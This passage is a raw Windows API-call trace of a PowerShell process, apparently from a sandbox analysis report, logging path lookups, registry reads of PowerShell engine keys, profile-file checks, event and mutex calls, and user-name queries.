lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.068] GetLastError () returned 0xcb [0054.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.068] GetLastError () returned 0xcb [0054.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.068] GetLastError () returned 0xcb [0054.068] VirtualQuery (in: lpAddress=0x14d588, lpBuffer=0x14e588, dwLength=0x1c | out: lpBuffer=0x14e588*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.069] GetLastError () returned 0xcb [0054.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | 
out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.069] GetLastError () returned 0xcb [0054.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.069] GetLastError () returned 0xcb [0054.069] VirtualQuery (in: lpAddress=0x14d580, lpBuffer=0x14e580, dwLength=0x1c | out: lpBuffer=0x14e580*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.069] VirtualQuery (in: lpAddress=0x14d234, lpBuffer=0x14e234, dwLength=0x1c | out: lpBuffer=0x14e234*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.069] VirtualQuery (in: lpAddress=0x14d234, lpBuffer=0x14e234, dwLength=0x1c | out: lpBuffer=0x14e234*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ecbc | out: phkResult=0x14ecbc*=0x374) returned 0x0 [0054.071] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x0, lpcbData=0x14ed00*=0x0 | out: lpType=0x14ed04*=0x1, lpData=0x0, lpcbData=0x14ed00*=0x56) returned 0x0 [0054.071] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x3175c0, lpcbData=0x14ed00*=0x56 | 
out: lpType=0x14ed04*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ed00*=0x56) returned 0x0 [0054.071] RegCloseKey (hKey=0x374) returned 0x0 [0054.071] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ecbc | out: phkResult=0x14ecbc*=0x374) returned 0x0 [0054.072] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x0, lpcbData=0x14ed00*=0x0 | out: lpType=0x14ed04*=0x1, lpData=0x0, lpcbData=0x14ed00*=0x56) returned 0x0 [0054.072] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ed04, lpData=0x3175c0, lpcbData=0x14ed00*=0x56 | out: lpType=0x14ed04*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ed00*=0x56) returned 0x0 [0054.072] RegCloseKey (hKey=0x374) returned 0x0 [0054.072] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3175c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0054.072] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0054.072] GetLastError () returned 0x3f0 [0054.072] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3175c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0054.072] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x14e854, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0054.072] GetLastError () returned 0x3f0 [0054.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0054.073] GetLastError () returned 0x3f0 [0054.073] SetErrorMode (uMode=0x1) returned 0x1 [0054.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.073] GetLastError () returned 0x2 [0054.073] SetErrorMode (uMode=0x1) returned 0x1 [0054.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0054.073] GetLastError () returned 0x2 [0054.073] SetErrorMode (uMode=0x1) returned 0x1 [0054.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.073] GetLastError () returned 0x2 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy 
yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x40 [0054.074] GetLastError () returned 0x2 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0054.074] GetLastError () returned 0x3 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x55 [0054.074] GetLastError () returned 0x3 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14ed6c | out: lpFileInformation=0x14ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) 
returned 0 [0054.074] GetLastError () returned 0x3 [0054.074] SetErrorMode (uMode=0x1) returned 0x1 [0054.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.074] GetLastError () returned 0xcb [0054.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.076] GetLastError () returned 0xcb [0054.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.077] GetLastError () returned 0xcb [0054.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.078] GetLastError () returned 0xcb [0054.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.079] GetLastError () returned 0xcb [0054.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.081] GetLastError () returned 0xcb [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374 [0054.081] GetLastError () returned 0x0 [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378 [0054.081] GetLastError () returned 0x0 [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0054.081] GetLastError () returned 0x0 [0054.081] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a0 [0054.082] GetLastError () returned 
0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2f8 [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc [0054.082] GetLastError () returned 0x0 [0054.082] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0054.082] GetLastError () returned 0x0 [0054.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.083] GetLastError () returned 0xcb [0054.085] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0054.085] GetLastError () returned 0xcb [0054.086] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14edac | out: lpMode=0x14edac) returned 1 [0054.086] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x380) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x374) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x378) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] SetEvent (hEvent=0x37c) returned 1 [0054.087] GetLastError () returned 0xcb [0054.087] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0054.087] GetLastError () returned 0x0 [0054.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.088] GetLastError () returned 0xcb [0054.088] RegOpenKeyExW 
(in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ec10 | out: phkResult=0x14ec10*=0x330) returned 0x0 [0054.088] RegQueryValueExW (in: hKey=0x330, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14ec58, lpData=0x0, lpcbData=0x14ec54*=0x0 | out: lpType=0x14ec58*=0x0, lpData=0x0, lpcbData=0x14ec54*=0x0) returned 0x2 [0057.058] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0057.058] GetLastError () returned 0x0 [0057.058] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ec [0057.058] GetLastError () returned 0x0 [0057.058] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x408 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c8 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x388 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f0 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4ec [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4f8 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4fc [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x500 
[0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x504 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x408) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x3e8) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x3ec) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] SetEvent (hEvent=0x3f4) returned 1 [0057.059] GetLastError () returned 0x0 [0057.059] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x508 [0057.060] GetLastError () returned 0x0 [0057.060] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14ec44 | out: phkResult=0x14ec44*=0x50c) returned 0x0 [0057.060] RegQueryValueExW (in: hKey=0x50c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14ec8c, lpData=0x0, lpcbData=0x14ec88*=0x0 | out: lpType=0x14ec8c*=0x0, lpData=0x0, lpcbData=0x14ec88*=0x0) returned 0x2 [0057.133] SetEvent (hEvent=0x4c8) returned 1 [0057.133] GetLastError () returned 0x0 [0057.133] SetEvent (hEvent=0x388) returned 1 [0057.133] GetLastError () returned 0x0 [0057.133] SetEvent (hEvent=0x4f0) returned 1 [0057.133] GetLastError () returned 0x0 [0057.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0057.164] GetLastError () returned 0xcb [0057.188] SetEvent (hEvent=0x314) returned 1 [0057.189] GetLastError () returned 0xcb [0057.189] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14ed20 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14ed20) returned 0x1 [0057.189] GetLastError () returned 0xcb [0057.189] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14ed28 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14ed28) returned 1 [0057.190] ReportEventW 
(hEventLog=0x4390004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2563cc8*="Stopped", lpRawData=0x2563b84) returned 1 [0057.195] GetLastError () returned 0x0 [0057.196] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0057.196] GetLastError () returned 0x0 [0057.197] CoGetContextToken (in: pToken=0x14fa58 | out: pToken=0x14fa58) returned 0x0 [0057.197] CObjectContext::QueryInterface () returned 0x0 [0057.197] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.197] Release () returned 0x0 [0057.199] CoGetContextToken (in: pToken=0x14f830 | out: pToken=0x14f830) returned 0x0 [0057.199] CObjectContext::QueryInterface () returned 0x0 [0057.199] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.199] Release () returned 0x0 [0057.205] CoGetContextToken (in: pToken=0x14f830 | out: pToken=0x14f830) returned 0x0 [0057.205] CObjectContext::QueryInterface () returned 0x0 [0057.205] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.205] Release () returned 0x0 [0057.212] CoGetContextToken (in: pToken=0x14f830 | out: pToken=0x14f830) returned 0x0 [0057.212] CObjectContext::QueryInterface () returned 0x0 [0057.213] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.213] Release () returned 0x0 [0057.245] CoGetContextToken (in: pToken=0x14f810 | out: pToken=0x14f810) returned 0x0 [0057.245] CObjectContext::QueryInterface () returned 0x0 [0057.245] CObjectContext::GetCurrentThreadType () returned 0x0 [0057.245] Release () returned 0x0 [0057.246] CoUninitialize () Thread: id = 54 os_tid = 0xb60 Thread: id = 55 os_tid = 0xb64 Thread: id = 56 os_tid = 0xb68 Thread: id = 57 os_tid = 0xb6c Thread: id = 58 os_tid = 0xb70 Thread: id = 59 os_tid = 0xb74 [0048.372] CoGetContextToken (in: pToken=0x3fffaa8 | out: pToken=0x3fffaa8) returned 0x0 [0048.372] CObjectContext::QueryInterface () returned 0x0 [0048.373] CObjectContext::GetCurrentThreadType () returned 0x0 [0048.373] Release () 
returned 0x0 [0048.373] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0052.297] LocalFree (hMem=0x2e3cb0) returned 0x0 [0052.297] GetLastError () returned 0x0 [0052.297] CloseHandle (hObject=0x31c) returned 1 [0052.297] GetLastError () returned 0x0 [0052.297] CloseHandle (hObject=0x13) returned 1 [0052.297] GetLastError () returned 0x0 [0052.298] CloseHandle (hObject=0xf) returned 1 [0052.298] GetLastError () returned 0x0 [0052.298] RegCloseKey (hKey=0x300) returned 0x0 [0052.298] RegCloseKey (hKey=0x2fc) returned 0x0 [0052.298] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.298] LocalFree (hMem=0x2e3d30) returned 0x0 [0052.298] GetLastError () returned 0x0 [0052.298] RegCloseKey (hKey=0x328) returned 0x0 [0053.387] RegCloseKey (hKey=0x368) returned 0x0 [0053.387] RegCloseKey (hKey=0x364) returned 0x0 [0053.388] RegCloseKey (hKey=0x360) returned 0x0 [0053.388] RegCloseKey (hKey=0x35c) returned 0x0 [0053.388] RegCloseKey (hKey=0x358) returned 0x0 [0053.388] RegCloseKey (hKey=0x354) returned 0x0 [0053.388] RegCloseKey (hKey=0x350) returned 0x0 [0053.388] RegCloseKey (hKey=0x398) returned 0x0 [0053.389] RegCloseKey (hKey=0x394) returned 0x0 [0053.389] RegCloseKey (hKey=0x340) returned 0x0 [0053.389] RegCloseKey (hKey=0x33c) returned 0x0 [0053.389] RegCloseKey (hKey=0x338) returned 0x0 [0053.389] RegCloseKey (hKey=0x334) returned 0x0 [0053.389] RegCloseKey (hKey=0x330) returned 0x0 [0053.390] RegCloseKey (hKey=0x32c) returned 0x0 [0053.390] RegCloseKey (hKey=0x31c) returned 0x0 [0053.390] RegCloseKey (hKey=0x2fc) returned 0x0 [0053.390] RegCloseKey (hKey=0x2f8) returned 0x0 [0053.390] RegCloseKey (hKey=0x390) returned 0x0 [0053.390] RegCloseKey (hKey=0x38c) returned 0x0 [0053.390] RegCloseKey (hKey=0x36c) returned 0x0 [0053.391] RegCloseKey (hKey=0x3a0) returned 0x0 [0053.391] RegCloseKey (hKey=0x384) returned 0x0 [0053.391] RegCloseKey (hKey=0x380) returned 0x0 [0053.391] RegCloseKey (hKey=0x37c) returned 0x0 [0053.391] RegCloseKey (hKey=0x378) returned 0x0 
[0053.391] RegCloseKey (hKey=0x374) returned 0x0 [0053.392] RegCloseKey (hKey=0x370) returned 0x0 [0053.392] RegCloseKey (hKey=0x34c) returned 0x0 [0053.392] RegCloseKey (hKey=0x39c) returned 0x0 [0053.392] RegCloseKey (hKey=0x328) returned 0x0 [0057.200] GetLastError () returned 0x0 [0057.200] GetLastError () returned 0x0 [0057.200] LocalFree (hMem=0x322440) returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] LocalFree (hMem=0x3225d8) returned 0x0 [0057.201] GetLastError () returned 0x0 [0057.201] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2563ef4, cbSid=0x3fff798 | out: pSid=0x2563ef4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.201] GetLastError () returned 0x0 [0057.202] CreateMutexW (lpMutexAttributes=0x2564004, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.202] GetLastError () returned 0x0 [0057.202] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.202] GetLastError () returned 0x0 [0057.202] ReleaseMutex (hMutex=0x528) returned 1 [0057.202] GetLastError () returned 0x0 [0057.202] CloseHandle (hObject=0x528) returned 1 [0057.202] GetLastError () returned 0x0 [0057.202] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2564210, cbSid=0x3fff798 | out: pSid=0x2564210*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.202] GetLastError () returned 0x0 [0057.202] CreateMutexW (lpMutexAttributes=0x2564320, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.202] GetLastError () returned 0x0 [0057.202] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.202] GetLastError () 
returned 0x0 [0057.202] ReleaseMutex (hMutex=0x528) returned 1 [0057.202] GetLastError () returned 0x0 [0057.203] CloseHandle (hObject=0x528) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x256452c, cbSid=0x3fff798 | out: pSid=0x256452c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CreateMutexW (lpMutexAttributes=0x256463c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.203] GetLastError () returned 0x0 [0057.203] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.203] GetLastError () returned 0x0 [0057.203] ReleaseMutex (hMutex=0x528) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CloseHandle (hObject=0x528) returned 1 [0057.203] GetLastError () returned 0x0 [0057.203] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2564848, cbSid=0x3fff798 | out: pSid=0x2564848*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x3fff798) returned 1 [0057.203] GetLastError () returned 0x0 [0057.204] CreateMutexW (lpMutexAttributes=0x2564958, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x528 [0057.204] GetLastError () returned 0x0 [0057.204] WaitForSingleObject (hHandle=0x528, dwMilliseconds=0x1f4) returned 0x0 [0057.204] GetLastError () returned 0x0 [0057.204] ReleaseMutex (hMutex=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CloseHandle (hObject=0x528) returned 1 [0057.204] GetLastError () returned 0x0 [0057.204] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2564b64, cbSid=0x3fff798 | out: pSid=0x2564b64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, 
